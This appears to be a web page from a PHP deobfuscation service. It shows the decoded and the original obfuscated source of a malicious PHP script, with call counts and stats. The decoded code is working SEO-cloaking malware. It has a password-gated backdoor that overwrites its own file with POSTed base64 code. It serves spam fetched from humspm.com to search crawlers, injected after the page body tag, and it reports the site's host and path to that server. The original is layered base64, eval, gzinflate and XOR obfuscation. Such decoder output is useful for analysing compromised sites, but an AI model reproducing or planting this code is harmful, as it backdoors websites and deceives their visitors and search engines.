Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php Error_Reporting(0); $xDFTZagjwNgi="lRhrU9s48K/H9Z0tJjWCAIU+CDPMwO+w445DFMcfAkPT2DoHc..

Decoded Output download


Error_Reporting(0);
if ($_SERVER['HTTP_USER_AGENT']=="ANTIPIDERSIA") {
die("<font color='green'>CHETKO</font>#NEWHUM-v1.88G");
}

//cloaka update
if (isset($_POST['upd_cl']) && md5($_POST['pw'])=='6fbcb8b698317491a5fd7926f2c3b7de')
{   
 $pifpath = (__FILE__);
	$r = file_put_contents($pifpath,base64_decode($_POST['upd_cl']));
	if ($r!=false)	{echo "UPDATE_OK";}	else	{echo "UPDATE_ERR";}	exit();
}


$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];

if (!preg_match('/selfbot/i', $server_user_agent)) {

$google = FALSE;

if (preg_match('/Googlebot|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|http|bot|spider|crawler/i', $server_user_agent)) {
$google = true;
}

$putfile = TRUE;

$getlinks = 'on';
$mod = '0';

    $dir=trim(str_replace('www.','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
    $dir=md5($dir);
	
	$path=trim($_SERVER['REQUEST_URI']);
    $path=md5($path);
	
	
    $srvhst = @$_SERVER['HTTP_HOST'];
    $srvhst = strtolower($srvhst);
	$srvfls = str_replace("www.","",$srvhst);
	$srvfls = md5($srvfls);
	
if (isset($tpp)) {
$tmppath = $tpp;
$tppyes = 'T';
} else {
 if (function_exists('sys_get_temp_dir')) {
$tmppath = sys_get_temp_dir();
 } else {
 $tmppath = (dirname(__FILE__));
 }
}

if(!is_dir($tmppath."/".$srvfls."/"))  {
mkdir ($tmppath."/".$srvfls."/",0777);
}

  $owner_host = "humspm.com";
  $remhost = str_replace("www.","",$_SERVER['HTTP_HOST']);
  $rempage = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  $rempage = urlencode($rempage);
  $linksurl = "http://".$owner_host."/counter.php?md5=".md5($remhost.$_SERVER['REQUEST_URI']."links")."&hst=".$remhost."&page=".$rempage;
  $selfagent = 'selfbot';
  $useragent = 'Opera 10.00';
 
function str_replace_once($search, $replace, $text) { 
   $pos = stripos($text, $search); 
   return $pos!==false ? substr_replace($text, $replace, $pos, strlen($search)) : $text; 
} 

function curl_redir_exec($ch)
  {
  static $curl_loops = 0;
  static $curl_max_loops = 3;
  if ($curl_loops >= $curl_max_loops)
    {
    $curl_loops = 0;
    return false;
    }
  curl_setopt($ch, CURLOPT_HEADER, true);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $data = curl_exec($ch);
  list($header, $data) = explode("

", $data, 2);
  $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
 
  if ($http_code == 301 || $http_code == 302)
    {
    $matches = array();
    preg_match('/Location:(.*?)
/', $header, $matches);
    $url = @parse_url(trim(array_pop($matches)));
    if (!$url)
      {
      $curl_loops = 0;
      return $data;
      }
    $last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
   
    if (!$url['scheme'])
      $url['scheme'] = $last_url['scheme'];
    if (!$url['host'])
      $url['host'] = $last_url['host'];
    if (!$url['path'])
      $url['path'] = $last_url['path'];
    $new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query']?'?'.$url['query']:'');
    curl_setopt($ch, CURLOPT_URL, $new_url);
	return curl_redir_exec($ch);
    }
  else
    {
    $curl_loops = 0;
    return $data;
    }
  }
  
function curPageURL() {
 $pageURL = 'http';
 if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
 $pageURL .= "://";
 if ($_SERVER["SERVER_PORT"] != "80") {
  $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;
}


function get_mydata($uri,$useragent,$getlinks,$mod,$srvhst,$dir,$path) {
       $ch = curl_init();
       curl_setopt ($ch, CURLOPT_URL,$uri);
       curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
       curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
	   curl_redir_exec($ch, CURLOPT_FOLLOWLOCATION, 1);
       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	   curl_setopt ($ch, CURLOPT_POST, 1);
	   curl_setopt ($ch, CURLOPT_POSTFIELDS, 'links='.$getlinks.'&mod='.$mod.'&host='.$srvhst.'&dir='.$dir.'&path='.$path);
       $result = curl_exec ($ch);
       curl_close($ch);
       $pos = strpos($result, "

");
       $result = substr($result, $pos+4);
       return $result;
    }



if ($google == TRUE) {
$selfuri = curPageURL();

$data = get_mydata($selfuri,$selfagent);

if (is_file($tmppath."/".$srvfls."/".$dir)) {

        $content = file_get_contents($tmppath."/".$srvfls."/".$dir);
		if (strlen($content) < 15) {
		unlink($tmppath."/".$srvfls."/".$dir);
		}
                                            }  else  {
											
				$content = get_mydata('http://humspm.com/gettext.php',$useragent,$getlinks,$mod,$srvhst,$dir,$path);							
											
											}
											
if (strlen($content) < 15) {
$putfile = FALSE;
}

$data = preg_replace('#(<body[^<>]*>)#si','${1}'."
".$content, $data, 1);
echo $data;

if ($putfile == TRUE) {
			$file = fopen($tmppath."/".$srvfls."/".$dir,'w');
            fwrite($file,$content);
            fclose($file);
	                   }	
exit;
}
}
eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhsWmtzMGRXRmhTRGhGUFdKaGMyVTJORjlrWldOdlpHVW9JbGx0Um5wYVZGa3dXREpTYkZreU9XdGFVVDA5SWlrN0pIaDJVa3BaVjBGTU0wbHZQV0poYzJVMk5GOWtaV052WkdVb0ltTXpVbmxpUjFaMUlpazdKSGhIZVVSUmJtVnVNa04xY1QxaVlYTmxOalJmWkdWamIyUmxLQ0paTW1oNUlpazdKSGhIVDFkSWRHRm9kakZ6UFdKaGMyVTJORjlrWldOdlpHVW9JbUl6U21zaUtUc2tlREZJWXpWNFF6RjBRVFZSYmoxaVlYTmxOalJmWkdWamIyUmxLQ0phTTNCd1ltMWFjMWxZVW13aUtUcz0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhFUmxSYVlXZHFkMDVuYVQwa2VERklZelY0UXpGMFFUVlJiaWdrZUdWbVN6UjFZV0ZJT0VVb0pIaEVSbFJhWVdkcWQwNW5hU2twT3lSNE4yaHBWV2gyYjBacmNsYzJQU1I0ZGxKS1dWZEJURE5KYnlna2VFUkdWRnBoWjJwM1RtZHBLVHM9IikpOw=="));eval(base64_decode("JHhEZnVvUzNFNUpJak49Jyc7Zm9yKCR4TG8xaHdEdHpxRT0wOyR4TG8xaHdEdHpxRTwkeDdoaVVodm9Ga3JXNjskeExvMWh3RHR6cUUrKyl7JHhEZnVvUzNFNUpJak4uPSR4R3lEUW5lbjJDdXEoKCR4R09XSHRhaHYxcygkeERGVFphZ2p3TmdpWyR4TG8xaHdEdHpxRV0pXjU2OTU2NzE1MSkpO31ldmFsKCR4RGZ1b1MzRTVKSWpOKTs="));eval(base64_decode("JHhlZks0dWFhSDhFPWJhc2U2NF9kZWNvZGUoIlltRnpaVFkwWDJSbFkyOWtaUT09Iik7JHh2UkpZV0FMM0lvPWJhc2U2NF9kZWNvZGUoImMzUnliR1Z1Iik7JHhHeURRbmVuMkN1cT1iYXNlNjRfZGVjb2RlKCJZMmh5Iik7JHhHT1dIdGFodjFzPWJhc2U2NF9kZWNvZGUoImIzSmsiKTskeDFIYzV4QzF0QTVRbj1iYXNlNjRfZGVjb2RlKCJaM3BwYm1ac1lYUmwiKTs="));eval(base64_decode("JHhERlRaYWdqd05naT0keDFIYzV4QzF0QTVRbigkeGVmSzR1YWFIOEUoJHhERlRaYWdqd05naSkpOyR4N2hpVWh2b0Zrclc2PSR4dlJKWVdBTDNJbygkeERGVFphZ2p3TmdpKTs="));$xefK4uaaH8E=base64_decode("YmFzZTY0X2RlY29kZQ==");$xvRJYWAL3Io=base64_decode("c3RybGVu");$xGyDQnen2Cuq=base64_decode("Y2hy");$xGOWHtahv1s=base64_decode("b3Jk");$x1Hc5xC1tA5Qn=base64_decode("Z3ppbmZsYXRl");

Did this file decode correctly?

Original Code

<?php Error_Reporting(0); $xDFTZagjwNgi="lRhrU9s48K/H9Z0tJjWCAIU+CDPMwO+w445DFMcfAkPT2DoHchOKy+V8lA9tTI7bleRHEsJwtGBrX1rtWz4+STi3eTpnsc1Dzzkzj4zd4xOvQ816+pjMfyXzB3KTZU/pDFbp9FtylZH7RsOaXmWTp8n3ZP44mVoGvTg+6XrMtHY6thNS33Zt3iBnnDGHbN/dJNmfo50aorbfXiU/b2bXb742tf39bxZu1j8+OT6p1XzXDj4HdBh3g5BJFbwoYiEo8jR6zB4IYFLfJfcG3digre6HAhEPANhokPednt/b771/t/+pefDxXTP40OkevDt83zn0P/UOuowYxycXlNLjE1qPvU4chG3aoGaa3k7GSZqiLqd1DqCO57I0HoapDyozJ4zMnF7vBRF7/zHtMt/uslXVhAxhPb7Z6ARuxIzTC+a3bWrNnr5PsyQd/Wnt9k8ZYJYQyXwuMF+80CzMcnxSjxj/yng6hGcanIE2oODfLzhnF7lQhc2Ys7O0FYR+2yS1iLmdnh3WPKLTVZmGcCHsdmbbZy6DLW6n48ekkLUg6pugAWHnZ1HwxufBwGX8fNqN/rLDNxJ5fs26XhAHPHQYj84LjjfXdg+Me94Ow/gcJUSx1wVmJeRF7UrdQj5kuYXq4Cf0F4Cz+UxqXD9joes5nyMAEtshAKy37C6ujoiggCig9a7HGyH3WmYU8pSz2A18ZpLBYKARnRB9ycY34Glyr5XQefLvLHnM0tl8ojxfSBXRCS8iHDCqMHbkXuv4c3ZBKfjxLRegkBH/2o6eCwCp3O4yGRwshFwcMG4qoAxyeO+4kSQoTm7hyS3dsvTnaYVScqXUquRoGMfKS2ErVpmFQDQ9PC6Z8EWG1u9TjH6kpSigM3T80LOdFCI/glQj0WWUggPTkLXiFIxIVgQvU4h8oRW5FVoT8E7QYmWaS2IVPl7H3PQiISRn0qyapamD4jtsj0Jbn4GIrqXSjw4ODoq8BSfYAwj9tG0LR1jtYSuKW5pvtyzhpTpnLYVb44PnHGwUvDEkBpo4p7LkM72aXidWJUqtSpRZ98vsQ+4yR1YyBVQ7iOwBrFAdcnWvhqctjwQn9u0hFEeuxe14C0KjYWkiQNS51uWJZgnRlqFZGxBiwFVwWBuogILgq1QFC1de94iqYkSisEIUqFEMC9o80o5EjkOVzyOrauHUdsDMIDTgfltHWwgwvIXsSwiBRkUO1WNbpYcHb6ZAisqEbMauJOIsHHJH0G42ZLWnWzQa9qoezVnLjYBcR8lg+lwRCLE9qQGK7lMMoUJ7H/wA4iD6IEWYb9aBHvfHQAc5Qej5tC6IXNuOUe2j3RVUK/hSoD8JtOhSFbbtxjKpIcvJhaoqz2xR2EAcXoH6+BDEUBnsOESFdXo3m49HT1l6k0xhatBFDZfBtpZ0nmSz+VU2n1493i6y1GFGCEALwVoYRaBcKCJmvc0CaCu6JDSAkn2JXYxz64fzw7EUQqeHSh7GeIqJkAuF8uI5HbtUaHJ1O0pFKt6NvieGjDBlxQo3WPeoSc/P6TLwcMmaopmKqhhwHlyaeQNY6LRj2w8wBvZM7fct44dTw/ZYnE2JKFqHzNe/oetGLIWFKRqOEJ/GdmwWDEWzEmMC8inlCvXWubsMerRfAewrDdwgClOpRqnFC/ZMbm+Tu2zyK4HiMM61WlLtgUSgdItB9St0WwBjGcw3LqHLJ3wgWGRWhEjgoggJWxWAZX9FgAQuCpCw3C0OGyibLOmtUQJ1lcBzQRdtUbIGASbWfwwZvyT3W2SLaAuQPUJyh67NJXjohSqifStHPlddqomMPfX1daAaFoJd/FksZk9QskEd05CtOpZLLOGYMqJ2L9w/LMy6R+se88iyHbxtFEwagCIYm6uCEIb9alWQ6pFPo3kG4jaBbv9IXl7oAvu6rmrtWdoaaS913Mpg8qptXhIFv0XbkZLKq0JhZJyNWpfoCgwdTy8bpV6MxjpOxPmkp+OwqsuJsywB4Op2Xg89R11LFKoSaHQ10nDX1xHDScW9Ra9081dxZpPrZDQDvkNxYz3NiRdDuaS/HY3Ho5/j0d00m4yudNp81S7LLai5sNezLHgjfDXh7SQZf3/UKRE+aUBi5/7RyAY4CCHwgAUWB1xJhwEA7xmwhgcsxK0BVvmdIXcgZ9HQDaudklYzPNcP7t4RW0KUI5CYgKQknVo/OLRQ+LWe3UdOPyU5SvntY4U0j15JUJYK+U/ka37Pkzc6Ofzj4AdBJU9SVBB521PDQDXqFbleTo9GcZeFcR8vjGsneWHT/EJMi1SQnwLyrwO4Wfl14EVJGAjim0A+8yk+g+7Q5gexz+np0EGvv0ZSv1TqNT99WcKp3Kb4kYvKqSrWI2riL+8sNcDidIrDPvl/5WR3YcPnFv0l1Mumqtz3808U/WoUiPmpuMy/NXd6dvfy4Z+d7fvft423kQdX+/pFs080mATBrGqDYiAUeSu+y+StTAVlsW0lKtGCSpeOHaO+L7lPJwNSSQTx0xlwL4RQRCl6cdplIpWeSJSXlRU3g+Hw05E0B/z/Dw==";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doc1dtdHpNR1JYUm1oVFJHaEdVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkd4MFVtNXdZVlpHYTNkWFJFcFRZa1pyZVU5WGRHRlZWREE1U1dsck4wcElhREpWYTNCYVZqQkdUVTB3YkhaUVYwcG9ZekpWTWs1R09XdGFWMDUyV2tkVmIwbHRUWHBWYm14cFVqRmFNVWxwYXpkS1NHaElaVlZTVW1KdFZuVk5hMDR4WTFReGFWbFlUbXhPYWxKbVdrZFdhbUl5VW14TFEwcGFUVzFvTlVscGF6ZEtTR2hJVkRGa1NXUkhSbTlrYWtaNlVGZEthR015VlRKT1JqbHJXbGRPZGxwSFZXOUpiVWw2VTIxemFVdFVjMnRsUkVaSldYcFdORkY2UmpCUlZGWlNZbW94YVZsWVRteE9hbEptV2tkV2FtSXlVbXhMUTBwaFRUTkNkMWx0TVdGak1XeFpWVzEzYVV0VWN6MGlLU2s3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NKS1NHaEZVbXhTWVZsWFpIRmtNRFZ1WVZRd2EyVkVSa2xaZWxZMFVYcEdNRkZVVmxKaWFXZHJaVWRXYlZONlVqRlpWMFpKVDBWVmIwcElhRVZTYkZKaFdWZGtjV1F3Tlc1aFUydHdUM2xTTkU0eWFIQldWMmd5WWpCYWNtTnNZekpRVTFJMFpHeEtTMWRXWkVKVVJFNUtZbmxuYTJWRlVrZFdSbkJvV2pKd00xUnRaSEJMVkhNOUlpa3BPdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoRVpuVnZVek5GTlVwSmFrNDlKeWM3Wm05eUtDUjRURzh4YUhkRWRIcHhSVDB3T3lSNFRHOHhhSGRFZEhweFJUd2tlRGRvYVZWb2RtOUdhM0pYTmpza2VFeHZNV2gzUkhSNmNVVXJLeWw3SkhoRVpuVnZVek5GTlVwSmFrNHVQU1I0UjNsRVVXNWxiakpEZFhFb0tDUjRSMDlYU0hSaGFIWXhjeWdrZUVSR1ZGcGhaMnAzVG1kcFd5UjRURzh4YUhkRWRIcHhSVjBwWGpVMk9UVTJOekUxTVNrcE8zMWxkbUZzS0NSNFJHWjFiMU16UlRWS1NXcE9LVHM9IikpOw=='\x29\x29\x3B",".");return;?>

Function Calls

chr 5082
ord 5082
strlen 1
gzinflate 1
preg_replace 1
base64_decode 2
Error_Reporting 1

Variables

$xGOWHtahv1s ord
$xLo1hwDtzqE 5082
$xefK4uaaH8E base64_decode
$xvRJYWAL3Io strlen
$xGyDQnen2Cuq chr
$x1Hc5xC1tA5Qn gzinflate
$x7hiUhvoFkrW6 5082
$xDfuoS3E5JIjN Error_Reporting(0); if ($_SERVER['HTTP_USER_AGENT']=="ANT..

Stats

MD5 fb7893e85c1ad408fd0246d490e4ca21
Eval Count 11
Decode Time 17458 ms